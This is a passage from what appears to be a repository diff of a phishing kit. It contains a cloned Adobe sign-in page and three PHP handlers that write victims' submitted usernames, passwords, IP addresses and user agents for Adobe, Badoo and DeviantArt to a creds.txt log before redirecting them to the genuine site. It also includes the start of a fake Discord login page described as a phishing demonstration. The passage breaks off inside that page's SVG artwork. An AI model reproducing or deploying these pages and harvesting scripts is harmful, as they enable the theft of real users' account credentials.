<input id="adobeid_scope" name="scope" value="AdobeID,openid,sunbreak,acct_mgmt_webui,gnav,additional_info.account_type,sao.cce_private,creative_cloud,read_countries_regions,update_profile.password,additional_info.roles,update_profile.optionalAgreements,update_profile.change_password,additional_info.social,social.link,unlink_social_account,admin_slo,reauthenticated" type="hidden">
<fieldset>
<span class="component-wrapper" for="username"><input aria-label="Email address" aria-required="true" autocapitalize="off" autocorrect="off" class="" data-component="usertypedetector" data-component-usertypedetector-blocknont1="false" data-component-usertypedetector-client-id="SunbreakWebUI1" data-component-usertypedetector-endpoint="/renga-idprovider/pages/login_flow" data-component-usertypedetector-enforceuser="false" data-component-usertypedetector-idp-flow-type="login" data-component-usertypedetector-reauthentication="true" data-component-usertypedetector-use-flow="true" id="adobeid_username" name="username" novalidate="novalidate" placeholder="Email address" tabindex="1" value="" type="email"><div class="username-checknote" style="display: none"><span class="checknote"></span></div><div id="username-spinner" class="input-inline-spinner"><div class="inline-spinner"><div class="inline-spinner-element"></div><div class="inline-spinner-element mod-second"></div><div class="inline-spinner-element mod-third"></div></div></div></span>
</fieldset>
<fieldset>
<span class="component-wrapper" for="password"><input aria-label="Password" aria-required="true" class="text-center" data-component="capsindicator passwordrevealer" id="adobeid_password" name="password" placeholder="Password" tabindex="2" value="" type="password"><div class="caps-indicator"><span class="caps-indicator-img"></span></div><div class="password-revealer off"><div class="password-revealer-img"></div></div><div class="caps-indicator"><span class="caps-indicator-img"></span></div></span>
</fieldset>
<fieldset class="row mod-form-button Flexible-Container">
<div class="Flexible-Column">
<button class="mod-main" id="sign_in" onclick="window.scReport('SignIn:onClick_SignInAdobeId')" tabindex="4">Sign in</button></div>
<div class="Flexible-Column mod-grow">
<div class="forgot-password-container">
<a id="adobeid_trouble_signing_in" tabindex="5" data-component="spinner" class="forgotpassword" href="/renga-idprovider/pages/start_forgot_password?client_id=SunbreakWebUI1&amp;callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FSunbreakWebUI1%2FAdobeID%2Ftoken%3Fredirect_uri%3Dhttps%253A%252F%252Faccounts.adobe.com%252F%2523from_ims%253Dtrue%2526old_hash%253D%2526api%253Dauthorize%2526reauth%253Dforce%26scope%3DAdobeID%252Copenid%252Csunbreak%252Cacct_mgmt_webui%252Cgnav%252Cadditional_info.account_type%252Csao.cce_private%252Ccreative_cloud%252Cread_countries_regions%252Cupdate_profile.password%252Cadditional_info.roles%252Cupdate_profile.optionalAgreements%252Cupdate_profile.change_password%252Cadditional_info.social%252Csocial.link%252Cunlink_social_account%252Cadmin_slo%252Creauthenticated&amp;denied_callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fdenied%2FSunbreakWebUI1%3Fredirect_uri%3Dhttps%253A%252F%252Faccounts.adobe.com%252F%2523from_ims%253Dtrue%2526old_hash%253D%2526api%253Dauthorize%2526reauth%253Dforce%26response_type%3Dtoken&amp;display=web_v2&amp;locale=en_US&amp;relay=ddf39b99-b9ba-4e0c-af20-f0aa6bd69144&amp;flow=true&amp;flow_type=token&amp;idp_flow_type=login&amp;reauthenticate=force&amp;s_account=adbadobenonacdcprod%2Cadbims" onclick="scReport('SignIn:onClick_ForgotPassword')">
Forgot password?</a>
</div></div>
</fieldset>
<div class="row">
<div class="row">
<span class="nowrap">Not a member yet?</span>
<a class="nowrap" data-component="spinner" href="create_account?client_id=SunbreakWebUI1&amp;callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FSunbreakWebUI1%2FAdobeID%2Ftoken%3Fredirect_uri%3Dhttps%253A%252F%252Faccounts.adobe.com%252F%2523from_ims%253Dtrue%2526old_hash%253D%2526api%253Dauthorize%2526reauth%253Dforce%26scope%3DAdobeID%252Copenid%252Csunbreak%252Cacct_mgmt_webui%252Cgnav%252Cadditional_info.account_type%252Csao.cce_private%252Ccreative_cloud%252Cread_countries_regions%252Cupdate_profile.password%252Cadditional_info.roles%252Cupdate_profile.optionalAgreements%252Cupdate_profile.change_password%252Cadditional_info.social%252Csocial.link%252Cunlink_social_account%252Cadmin_slo%252Creauthenticated&amp;denied_callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fdenied%2FSunbreakWebUI1%3Fredirect_uri%3Dhttps%253A%252F%252Faccounts.adobe.com%252F%2523from_ims%253Dtrue%2526old_hash%253D%2526api%253Dauthorize%2526reauth%253Dforce%26response_type%3Dtoken&amp;display=web_v2&amp;locale=en_US&amp;relay=ddf39b99-b9ba-4e0c-af20-f0aa6bd69144&amp;flow=true&amp;flow_type=token&amp;idp_flow_type=login&amp;reauthenticate=force&amp;s_account=adbadobenonacdcprod%2Cadbims" id="create_account">Get an Adobe ID</a></div>
<div class="row">
<span id="enterprise_teaser_text">Want to use your company or school account?</span> <br>
<a id="enterprise_signin_link" data-component="spinner viewswitcher" data-component-viewswitcher-targettitle="Sign in with an Enterprise ID" data-component-viewswitcher-targettype="enterprise" data-component-viewswitcher-targetview="#enterprise_view" href="login?idp_flow_type=login_t2&amp;client_id=SunbreakWebUI1&amp;callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FSunbreakWebUI1%2FAdobeID%2Ftoken%3Fredirect_uri%3Dhttps%253A%252F%252Faccounts.adobe.com%252F%2523from_ims%253Dtrue%2526old_hash%253D%2526api%253Dauthorize%2526reauth%253Dforce%26scope%3DAdobeID%252Copenid%252Csunbreak%252Cacct_mgmt_webui%252Cgnav%252Cadditional_info.account_type%252Csao.cce_private%252Ccreative_cloud%252Cread_countries_regions%252Cupdate_profile.password%252Cadditional_info.roles%252Cupdate_profile.optionalAgreements%252Cupdate_profile.change_password%252Cadditional_info.social%252Csocial.link%252Cunlink_social_account%252Cadmin_slo%252Creauthenticated&amp;denied_callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fdenied%2FSunbreakWebUI1%3Fredirect_uri%3Dhttps%253A%252F%252Faccounts.adobe.com%252F%2523from_ims%253Dtrue%2526old_hash%253D%2526api%253Dauthorize%2526reauth%253Dforce%26response_type%3Dtoken&amp;display=web_v2&amp;locale=en_US&amp;relay=ddf39b99-b9ba-4e0c-af20-f0aa6bd69144&amp;flow=true&amp;flow_type=token&amp;idp_flow_type=login&amp;reauthenticate=force&amp;s_account=adbadobenonacdcprod%2Cadbims">
Sign in with an Enterprise ID</a>
</div>
</div>
<input name="vi" id="adobeid_vi" value="" type="hidden">
<input name="authSrc" value="AdobeID" type="hidden">
<input name="is_reauthenticating" id="is_reauthenticating" value="true" type="hidden">
</form>
<div class="row mod-top-spaced mod-bot-spaced Separator">
<span class="Separator-Content">Or sign in with</span>
</div>
<div class="social-sign-in row">
<a class="button mod-main mod-facebook" href="/renga-idprovider/social/v2/signin/facebook?client_id=SunbreakWebUI1&amp;callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FSunbreakWebUI1%2FAdobeID%2Ftoken%3Fredirect_uri%3Dhttps%253A%252F%252Faccounts.adobe.com%252F%2523from_ims%253Dtrue%2526old_hash%253D%2526api%253Dauthorize%2526reauth%253Dforce%26scope%3DAdobeID%252Copenid%252Csunbreak%252Cacct_mgmt_webui%252Cgnav%252Cadditional_info.account_type%252Csao.cce_private%252Ccreative_cloud%252Cread_countries_regions%252Cupdate_profile.password%252Cadditional_info.roles%252Cupdate_profile.optionalAgreements%252Cupdate_profile.change_password%252Cadditional_info.social%252Csocial.link%252Cunlink_social_account%252Cadmin_slo%252Creauthenticated&amp;denied_callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fdenied%2FSunbreakWebUI1%3Fredirect_uri%3Dhttps%253A%252F%252Faccounts.adobe.com%252F%2523from_ims%253Dtrue%2526old_hash%253D%2526api%253Dauthorize%2526reauth%253Dforce%26response_type%3Dtoken&amp;display=web_v2&amp;locale=en_US&amp;relay=ddf39b99-b9ba-4e0c-af20-f0aa6bd69144&amp;flow=true&amp;flow_type=token&amp;idp_flow_type=login&amp;reauthenticate=force&amp;s_account=adbadobenonacdcprod%2Cadbims" id="facebook-sign-in-button" onclick="window.scReport('SocialV2:onClick_SocialSignIn', {eVar115: 'facebook'})">Facebook</a>
<a class="button mod-main mod-google" href="/renga-idprovider/social/v2/signin/google?client_id=SunbreakWebUI1&amp;callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FSunbreakWebUI1%2FAdobeID%2Ftoken%3Fredirect_uri%3Dhttps%253A%252F%252Faccounts.adobe.com%252F%2523from_ims%253Dtrue%2526old_hash%253D%2526api%253Dauthorize%2526reauth%253Dforce%26scope%3DAdobeID%252Copenid%252Csunbreak%252Cacct_mgmt_webui%252Cgnav%252Cadditional_info.account_type%252Csao.cce_private%252Ccreative_cloud%252Cread_countries_regions%252Cupdate_profile.password%252Cadditional_info.roles%252Cupdate_profile.optionalAgreements%252Cupdate_profile.change_password%252Cadditional_info.social%252Csocial.link%252Cunlink_social_account%252Cadmin_slo%252Creauthenticated&amp;denied_callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fdenied%2FSunbreakWebUI1%3Fredirect_uri%3Dhttps%253A%252F%252Faccounts.adobe.com%252F%2523from_ims%253Dtrue%2526old_hash%253D%2526api%253Dauthorize%2526reauth%253Dforce%26response_type%3Dtoken&amp;display=web_v2&amp;locale=en_US&amp;relay=ddf39b99-b9ba-4e0c-af20-f0aa6bd69144&amp;flow=true&amp;flow_type=token&amp;idp_flow_type=login&amp;reauthenticate=force&amp;s_account=adbadobenonacdcprod%2Cadbims" id="google-sign-in-button" onclick="window.scReport('SocialV2:onClick_SocialSignIn', {eVar115: 'google'})">Google</a>
</div>
</div>
<div class="view" style="display:none" id="enterprise_view">
<div class="row mod-title-row">
<h1 class="page-action">
For your protection, please verify your identity.</h1>
</div>
<div class="row mod-spaced" id="enterpriseintrotext">
<p id="enterprise_enter_email_text">
Need help with Enterprise ID?
&nbsp;
<a href="/renga-idprovider/pages/newwindow?new_url=http%3A%2F%2Fwww.adobe.com%2Fgo%2Flearn-more-enterprise-id">Learn more.</a>
</p>
</div>
<div class="row">
<span class="error backend"></span>
</div>
<form id="enterprise_signin" class="loginform" method="post" action="login_t2.do" data-component="spinner" novalidate="novalidate">
<input class="notinview" aria-hidden="true" tabindex="-1" type="password">
<input id="enterpriseid_callback" name="callback" value="https://ims-na1.adobelogin.com/ims/adobeid/SunbreakWebUI1/AdobeID/token?redirect_uri=https%3A%2F%2Faccounts.adobe.com%2F%23from_ims%3Dtrue%26old_hash%3D%26api%3Dauthorize%26reauth%3Dforce&amp;scope=AdobeID%2Copenid%2Csunbreak%2Cacct_mgmt_webui%2Cgnav%2Cadditional_info.account_type%2Csao.cce_private%2Ccreative_cloud%2Cread_countries_regions%2Cupdate_profile.password%2Cadditional_info.roles%2Cupdate_profile.optionalAgreements%2Cupdate_profile.change_password%2Cadditional_info.social%2Csocial.link%2Cunlink_social_account%2Cadmin_slo%2Creauthenticated" type="hidden">
<input id="enterpriseid_client_id" name="client_id" value="SunbreakWebUI1" type="hidden">
<input id="enterpriseid_denied_callback" name="denied_callback" value="https://ims-na1.adobelogin.com/ims/denied/SunbreakWebUI1?redirect_uri=https%3A%2F%2Faccounts.adobe.com%2F%23from_ims%3Dtrue%26old_hash%3D%26api%3Dauthorize%26reauth%3Dforce&amp;response_type=token" type="hidden">
<input id="enterpriseid_display" name="display" value="web_v2" type="hidden">
<input id="enterpriseid_flow" name="flow" value="true" type="hidden">
<input id="enterpriseid_flow_type" name="flow_type" value="token" type="hidden">
<input id="enterpriseid_idp_flow_type" name="idp_flow_type" value="login" type="hidden">
<input id="enterpriseid_locale" name="locale" value="en_US" type="hidden">
<input id="enterpriseid_page_name" name="page_name" value="onLoad_SignInForm" type="hidden">
<input id="enterpriseid_reauthenticate" name="reauthenticate" value="force" type="hidden">
<input id="enterpriseid_relay" name="relay" value="ddf39b99-b9ba-4e0c-af20-f0aa6bd69144" type="hidden">
<input id="enterpriseid_scope" name="scope" value="AdobeID,openid,sunbreak,acct_mgmt_webui,gnav,additional_info.account_type,sao.cce_private,creative_cloud,read_countries_regions,update_profile.password,additional_info.roles,update_profile.optionalAgreements,update_profile.change_password,additional_info.social,social.link,unlink_social_account,admin_slo,reauthenticated" type="hidden">
<fieldset>
<span class="component-wrapper" for="username"><input aria-label="Email address or domain name" aria-required="true" autocapitalize="off" autocorrect="off" class="" data-component="usertypedetector" data-component-usertypedetector-blocknont1="false" data-component-usertypedetector-client-id="SunbreakWebUI1" data-component-usertypedetector-endpoint="/renga-idprovider/pages/login_flow" data-component-usertypedetector-enforceuser="false" data-component-usertypedetector-idp-flow-type="login" data-component-usertypedetector-reauthentication="true" data-component-usertypedetector-use-flow="true" id="enterprise_username" name="username" novalidate="novalidate" placeholder="Email address or domain name" tabindex="1" value="" type="email"><div class="username-checknote" style="display: none"><span class="checknote"></span></div><div id="username-spinner" class="input-inline-spinner"><div class="inline-spinner"><div class="inline-spinner-element"></div><div class="inline-spinner-element mod-second"></div><div class="inline-spinner-element mod-third"></div></div></div></span>
</fieldset>
<fieldset id="passwordfieldset">
<span class="component-wrapper" for="password"><input aria-label="Password" aria-required="true" class="text-center" data-component="capsindicator passwordrevealer" id="enterprise_password" name="password" placeholder="Password" tabindex="2" value="" type="password"><div class="caps-indicator"><span class="caps-indicator-img"></span></div><div class="password-revealer off"><div class="password-revealer-img"></div></div></span>
</fieldset>
<div class="row mod-bot-spaced" id="signinoptions">
<p>
</p><div class="forgot-password-container">
<a id="enterprise_trouble_signing_in" tabindex="5" data-component="spinner" class="forgotpassword" href="/renga-idprovider/pages/start_forgot_password?client_id=SunbreakWebUI1&amp;callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FSunbreakWebUI1%2FAdobeID%2Ftoken%3Fredirect_uri%3Dhttps%253A%252F%252Faccounts.adobe.com%252F%2523from_ims%253Dtrue%2526old_hash%253D%2526api%253Dauthorize%2526reauth%253Dforce%26scope%3DAdobeID%252Copenid%252Csunbreak%252Cacct_mgmt_webui%252Cgnav%252Cadditional_info.account_type%252Csao.cce_private%252Ccreative_cloud%252Cread_countries_regions%252Cupdate_profile.password%252Cadditional_info.roles%252Cupdate_profile.optionalAgreements%252Cupdate_profile.change_password%252Cadditional_info.social%252Csocial.link%252Cunlink_social_account%252Cadmin_slo%252Creauthenticated&amp;denied_callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fdenied%2FSunbreakWebUI1%3Fredirect_uri%3Dhttps%253A%252F%252Faccounts.adobe.com%252F%2523from_ims%253Dtrue%2526old_hash%253D%2526api%253Dauthorize%2526reauth%253Dforce%26response_type%3Dtoken&amp;display=web_v2&amp;locale=en_US&amp;relay=ddf39b99-b9ba-4e0c-af20-f0aa6bd69144&amp;flow=true&amp;flow_type=token&amp;reauthenticate=force&amp;s_account=adbadobenonacdcprod%2Cadbims&amp;idp_flow_type=login_t2" onclick="scReport('SignIn:onClick_ForgotPassword')">
Forgot password?</a>
</div>
<p></p>
</div>
<fieldset class="row mod-spaced">
<button class="mod-main" id="enterprise_sign_in_button" onclick="window.scReport('SignIn:onClick_SignInEnterpriseId')" tabindex="4">
Sign in with an Enterprise ID</button>
</fieldset>
<div class="row onemorething">
<a id="enterprise_back_to_adobeid" data-component="spinner viewswitcher" data-component-viewswitcher-targettitle="Sign in with an Adobe ID" data-component-viewswitcher-targettype="adobeid" data-component-viewswitcher-targetview="#adobeid_view" href="login?idp_flow_type=login&amp;client_id=SunbreakWebUI1&amp;callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FSunbreakWebUI1%2FAdobeID%2Ftoken%3Fredirect_uri%3Dhttps%253A%252F%252Faccounts.adobe.com%252F%2523from_ims%253Dtrue%2526old_hash%253D%2526api%253Dauthorize%2526reauth%253Dforce%26scope%3DAdobeID%252Copenid%252Csunbreak%252Cacct_mgmt_webui%252Cgnav%252Cadditional_info.account_type%252Csao.cce_private%252Ccreative_cloud%252Cread_countries_regions%252Cupdate_profile.password%252Cadditional_info.roles%252Cupdate_profile.optionalAgreements%252Cupdate_profile.change_password%252Cadditional_info.social%252Csocial.link%252Cunlink_social_account%252Cadmin_slo%252Creauthenticated&amp;denied_callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fdenied%2FSunbreakWebUI1%3Fredirect_uri%3Dhttps%253A%252F%252Faccounts.adobe.com%252F%2523from_ims%253Dtrue%2526old_hash%253D%2526api%253Dauthorize%2526reauth%253Dforce%26response_type%3Dtoken&amp;display=web_v2&amp;locale=en_US&amp;relay=ddf39b99-b9ba-4e0c-af20-f0aa6bd69144&amp;flow=true&amp;flow_type=token&amp;idp_flow_type=login&amp;reauthenticate=force&amp;s_account=adbadobenonacdcprod%2Cadbims">
Sign in with an Adobe ID</a>
</div>
<input name="vi" id="enterprise_vi" value="" type="hidden">
</form>
</div>
<div id="chooser_template">
<div class="account-chooser binded" id="chooser_screen" tabindex="-1" role="region">
<div class="account-chooser-content">
<div class="container">
<div id="chooser_title" role="heading" class="row">
<h1 class="page-title">Choose an account for</h1>
</div>
<div class="row mod-spaced">
<strong class="account-chooser-email" id="checked_user_email"></strong>
</div>
<div class="account-chooser-account-list" role="menu" tabindex="-1" aria-labelledby="chooser_title">
<div id="adobeid-option" class="account-chooser-option adobeid item" data-usertype="ind" role="menuitem" tabindex="0">
<div class="account-chooser-arrow"></div>
<div class="account-chooser-account-type">Adobe ID</div>
<div class="account-chooser-account-type-description">Personal account</div>
</div>
<div id="enterpriseid-option" class="account-chooser-option enterprise item" data-usertype="ent" role="menuitem" tabindex="0">
<div class="account-chooser-account-type">Enterprise ID</div>
<div class="account-chooser-account-type-description">Company or school account</div>
<div class="account-chooser-arrow"></div>
</div>
</div>
<div class="account-chooser-footer">
<div class="row mod-top-spaced">
Need help?&nbsp;
<a href="/renga-idprovider/pages/newwindow?new_url=http%3A%2F%2Fwww.adobe.com%2Fgo%2Flearn-more-enterprise-id" id="learn_more_enterprise">Learn more.</a>
</div>
<div class="row">
<a href="#" class="close" role="button">Cancel</a>
</div>
</div>
</div>
</div>
</div>
<div class="chooser_screen account-chooser-spinner binded" id="external_redirect_waiter">
<div class="container">
<div class="account-chooser-spinner-content">
<div id="spinner_square" class="overlay-spinner"></div>
<div class="row mod-top-spaced">
<span>Redirecting you to sign in…</span><br>
</div>
<div class="row chooser_footer">
<a href="#" class="cancel">Cancel</a>
</div>
</div>
</div>
</div>
</div>
</div>
<script src="https://static.adobelogin.com/renga-idprovider/resources/60550808d7d722ea186a935459f7234f/spectrum/script/spectrum_body.js"></script>
<!--[if lte IE 9]>
<script src="https://static.adobelogin.com/renga-idprovider/resources/60550808d7d722ea186a935459f7234f/spectrum/script/ie.js"></script>
<![endif]-->
<script>
jQuery.validator.addMethod("validUsername", function (value, element) {
return this.optional(element) || !value.match(new RegExp("^[^@]*@+$"));
}, "Enter a valid email address");
$(document).ready(function () {
$(".loginform").each(function () {
$(this).validate({
errorPlacement: function (error, element) {
error.attr("aria-hidden", "true");
var fieldset = $(element).closest('fieldset');
if (fieldset) {
error.appendTo(fieldset);
} else {
error.insertAfter(element);
}
element.attr("aria-invalid", "true");
},
invalidHandler: function (event, validator) {
$(validator.errorList).each(function (id, error) {
switch (error.element.name) {
case "username":
if (error.rule === "required") {
scReport('SignIn:Error_EmptyEmail');
}
break;
case "password":
if (error.rule === "required") {
scReport('SignIn:Error_EmptyPassword');
}
break;
}
});
$('.error.backend').remove();
},
rules: {
username: {
required: true,
email: false,
maxlength: 100,
validUsername: true
},
password: {
required: true,
minlength: 6,
maxlength: 100
}
},
messages: {
username: {
required: "Enter your email",
maxlength: "A maximum of 60 characters are allowed for the Adobe ID."
},
password: {
required: "Enter your password",
minlength: "The password is too short",
maxlength: "The password is too long"
}
}
});
});
$('input[type="hidden"][name="remember_me"]').remove();
$("input[name='username']").change(function () {
this.value = $.trim(this.value);
});
$(".forgotpassword").on("mousedown touchstart",function(event){
var $this = $(this);
// this will kick in before the spinner component and replace the href of the link
var userFieldVal = $this.closest('form').find('input[name=username]').val();
var href = $this.attr('href');
if (components.utils.isEmail(userFieldVal)) {
$this.attr('href', href.replace(/[&\?]puser=[^&]+/, '') + '&puser=' + window.encodeURIComponent(userFieldVal));
}
})
});
var views = {
"enterprise": {
"onbeforeswitch": function () {
$(".loginform").each(function () {
$(this).validate().resetForm();
});
components.utils.switchLogo("enterprise");
//if switcher is enabled, swithcing the ui form the link should not pass the email from one ui to another
$("#enterprise_username").val("");
$("#enterprise_password").val("");
},
"onafterswitch": function () {
$(".backend").remove();
document.title = "Sign in - Enterprise ID";
$("#enterprise_username").focus();
}
},
"adobeid": {
"onbeforeswitch": function () {
$(".loginform").each(function () {
$(this).validate().resetForm();
});
components.utils.switchLogo("adobeid");
$("#adobeid_username").val("");
$("#adobeid_password").val("");
},
"onafterswitch": function () {
$(".backend").remove();
document.title = "Sign in - Adobe ID";
$("#adobeid_username").focus();
}
}
}
</script>
<script>
// disable form fields on submit
$('.loginform').on('submit', function() {
var $form = $(this);
if ($form.valid()) {
// make all fields readonly while submitting a form
$('input', $form).attr('readonly', 'true');
}
});
</script>
<script src="https://static.adobelogin.com/renga-idprovider/resources/60550808d7d722ea186a935459f7234f/spectrum/script/spectrum_capsindicator.js"></script>
<script>
$(document).ready(function () {
$("#facebook-sign-in-button, #google-sign-in-button").on("click", function(){
var rememberMeChecked = $("#adobeid_signin").find('input[name="remember_me"]').is(":checked");
var rememberMeParam = "remember_me=" + !!rememberMeChecked;
var rememberMeRegex = /([?&])(remember_me=[^&$]*)/;
var href = '';
if (rememberMeRegex.test(this.href)) {
href = this.href.replace(rememberMeRegex, "$1" + rememberMeParam);
} else {
href = this.href + "&" + rememberMeParam;
}
this.setAttribute("href", href);
});
});
</script>
<script>/* <susi-9057> */
$("#different-email-back").attr("onclick","scReport('SignIn:onClick_UnifiedCheckoutDifferentEmail', null, this)");
$("#unified-checkout-back").attr("onclick","scReport('SignIn:onClick_UnifiedCheckoutBack', null, this)");
/*</susi-9057>*/
</script>
</body></html>

View File

@ -0,0 +1,27 @@
<?php
if(isset($_SERVER['HTTP_CLIENT_IP']))
{
$ipaddr = $_SERVER['HTTP_CLIENT_IP'];
}
elseif(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$ipaddr = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
else
{
$ipaddr = $_SERVER['REMOTE_ADDR'];
}
if(strpos($ipaddr,',') !== false)
{
$ipaddr = preg_split("/\,/", $ipaddr)[0];
}
$fp = fopen("../logs/creds.txt", 'a');
fwrite($fp, "\n\nTimestamp: " . date('Y-m-d H:i:s') . "\nIP: " . $ipaddr . "\r\n" . "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\n");
fclose($fp);
file_put_contents("../logs/creds.txt", "Adobe Username: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://adobe.ly/2OE9ZKL');
exit();
?>

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,27 @@
<?php
if(isset($_SERVER['HTTP_CLIENT_IP']))
{
$ipaddr = $_SERVER['HTTP_CLIENT_IP'];
}
elseif(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$ipaddr = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
else
{
$ipaddr = $_SERVER['REMOTE_ADDR'];
}
if(strpos($ipaddr,',') !== false)
{
$ipaddr = preg_split("/\,/", $ipaddr)[0];
}
$fp = fopen("../logs/creds.txt", 'a');
fwrite($fp, "\n\nTimestamp: " . date('Y-m-d H:i:s') . "\nIP: " . $ipaddr . "\r\n" . "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\n");
fclose($fp);
file_put_contents("../logs/creds.txt", "Badoo Username: " . $_POST['email'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://badoo.com/forgot/');
exit();
?>

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,27 @@
<?php
if(isset($_SERVER['HTTP_CLIENT_IP']))
{
$ipaddr = $_SERVER['HTTP_CLIENT_IP'];
}
elseif(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$ipaddr = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
else
{
$ipaddr = $_SERVER['REMOTE_ADDR'];
}
if(strpos($ipaddr,',') !== false)
{
$ipaddr = preg_split("/\,/", $ipaddr)[0];
}
$fp = fopen("../logs/creds.txt", 'a');
fwrite($fp, "\n\nTimestamp: " . date('Y-m-d H:i:s') . "\nIP: " . $ipaddr . "\r\n" . "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\n");
fclose($fp);
file_put_contents("../logs/creds.txt", "Deviantart Username: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://www.deviantart.com/users/forgot/');
exit();
?>

View File

@ -0,0 +1,23 @@
MIT License
Copyright (c) 2022 Ali Milani
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
# https://github.com/AliMilani/fake-discord

Binary file not shown.

After

Width:  |  Height:  |  Size: 85 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 24 KiB

View File

@ -0,0 +1,820 @@
<!-- # by [Ali Milani Amin] -->
<!-- # ~> https://github.com/AliMilani/fake-discord -->
<!-- MIT License -->
<!-- This is a Fake Page just to demostrate how phishing works -->
<html lang="en-US" style="font-size: 100%; --saturation-factor: 1"
class="full-motion disable-forced-colors theme-dark platform-web font-size-16" data-rh="lang,style,class">
<head>
<meta charset="utf-8" />
<meta content="width=device-width, initial-scale=1.0, maximum-scale=1, user-scalable=no" name="viewport" />
<meta property="og:type" content="website" />
<meta property="og:site_name" content="Discord" />
<meta property="og:title" content="Discord - A New Way to Chat with Friends &amp; Communities" />
<meta property="og:description"
content="Discord is the easiest way to communicate over voice, video, and text. Chat, hang out, and stay close with your friends and communities." />
<meta property="og:image" content="banner.png" />
<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:site" content="@discord" />
<meta name="twitter:creator" content="@discord" />
<link rel="stylesheet" href="style.css" />
<title>Discord</title>
<link rel="icon" href="fav.ico" />
</head>
<body>
<div id="app-mount" class="appMount-2yBXZl">
<div style="position: fixed; opacity: 0; pointer-events: none"></div>
<div class="app-3xd6d0">
<div class="characterBackground-1BPOOJ">
<a href="/" target="_blank" rel="noopener" class="logo-2Rw1Ex logo-3ac3fP"
style="opacity: 1; transform: translateY(0px) translateZ(0px)"></a><svg class="artwork-L5TAwQ"
preserveAspectRatio="xMinYMin slice" xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 1700 1200">
<defs>
<linearGradient id="linear-gradient-2" x1="1512.99" x2="1503.54" y1="519.46" y2="476.33"
gradientUnits="userSpaceOnUse">
<stop offset="0" stop-color="#ffe75c"></stop>
<stop offset="1" stop-color="#ffc619"></stop>
</linearGradient>
<linearGradient id="linear-gradient-3" x1="1441.31" x2="1426.37" y1="493.59" y2="538.11"
xlink:href="#linear-gradient-2"></linearGradient>
<linearGradient id="linear-gradient-4" x1="1170.7" x2="1126.43" y1="805.19" y2="847.49"
gradientUnits="userSpaceOnUse">
<stop offset="0" stop-color="#d11583"></stop>
<stop offset="1" stop-color="#eb50a4"></stop>
</linearGradient>
<linearGradient id="linear-gradient-5" x1="693.92" x2="693.92" y1="1235.03" y2="1193.91"
gradientTransform="rotate(-21.3 -1852.872 -1403.071)" gradientUnits="userSpaceOnUse">
<stop offset="0" stop-color="#66bcff"></stop>
<stop offset="1" stop-color="#8cd9ff"></stop>
</linearGradient>
<linearGradient id="linear-gradient-6" x1="-6.39" x2="-57.56" y1="1177.84" y2="1139.89"
gradientTransform="rotate(-4.2 -13157.002 -13444.26)" gradientUnits="userSpaceOnUse">
<stop offset="0" stop-color="#ffc619"></stop>
<stop offset="1" stop-color="#ffe75c"></stop>
</linearGradient>
</defs>
<path fill="#5865f2" d="M0 0H1700V1200H0z" data-name="Layer 4"></path>
<g data-name="Layer 5">
<path fill="#6270fc"
d="M935.8 386.9c-2.1 0-4.2.2-6.3.3a126.6 126.6 0 00-176.9-48.4 126.3 126.3 0 00-225.3 48.3 64.7 64.7 0 00-8.6-5.8c-34.2-19.9-78.7-7-99.3 28.6-18.4 31.7-11.6 70.9 14.4 93.1-14.2 9.1-23.3 23-23.3 38.6 0 27.4 28 49.6 62.7 49.6a74.7 74.7 0 0034.9-8.4A126.4 126.4 0 00746 550.7a126.2 126.2 0 00166.8-20.2 73.6 73.6 0 0096.7-69.9 73.7 73.7 0 00-73.7-73.7z">
</path>
<path fill="#6270fc"
